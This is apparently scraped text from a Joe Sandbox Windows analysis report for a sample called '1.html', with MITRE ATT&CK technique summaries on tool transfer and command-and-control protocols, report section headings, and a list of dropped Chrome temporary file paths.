Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecoveryCRX.crx

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\verified_contents.json

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\manifest.json

C:\Users\user\AppData\Local\Google\Chrome\User Data\1636aa9d-3111-4a5c-843c-94249e78b200.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\4f00f4dd-4d61-4a8f-a33c-d99f5834a4dd.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\5c74f169-4077-46da-8357-ae9c63af9761.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\646b25b4-9e2a-466d-a8b1-89001cded742.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\78810434-2722-4012-abaa-07d79d32a1eb.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\92355d72-a90c-4b7b-bc8c-2ba970f452bc.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\0168d31b-89b6-4dd6-8f26-9bb9f3352779.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\086bb8f0-72ec-4e10-add1-7448defa4df3.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\1a82ff71-aec4-4559-9204-4e9cb29a979e.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\22684be1-e6cb-4b2d-98bd-b59a8fa29d34.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\39eda3ed-a8ec-43b7-a6a7-fbea533e1abe.tmp

Windows Analysis Report
1.html